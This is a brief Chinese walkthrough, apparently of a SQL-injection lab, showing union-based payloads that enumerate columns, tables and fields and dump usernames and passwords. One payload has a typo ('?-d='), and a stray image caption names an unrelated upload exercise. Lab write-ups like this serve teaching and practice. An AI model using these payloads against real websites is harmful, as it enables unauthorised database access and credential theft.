输入?id=1 得到登录页面:
通过order by 函数试探:
5的时候报错
试探到3 的时候返回正确的值:
然后继续注入:?id= -1 ' union select 1,2,3 --+ 查看回显点:
开始查看数据库内容:id=-1' union select 1,database(),3 --+
得到当前数据库是security
查询数据库里面的表内容:
id=-1%27%20union%20select%201,2,group_concat(table_name) from information_schema.tables where table_schema=database()%20--+
查询表里面的列名:
?id=-1 'union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='users'%20--+
查询字段详细内容:payload:
?-d=-1' union%20select%201,2,group_concat(0x7e,username,0x5c,password,0x7e)from users %20--+
![练习 3 Web [ACTF2020 新生赛]Upload](https://img-blog.csdnimg.cn/direct/93d49f2a68414016b523c4ea5d959175.png)
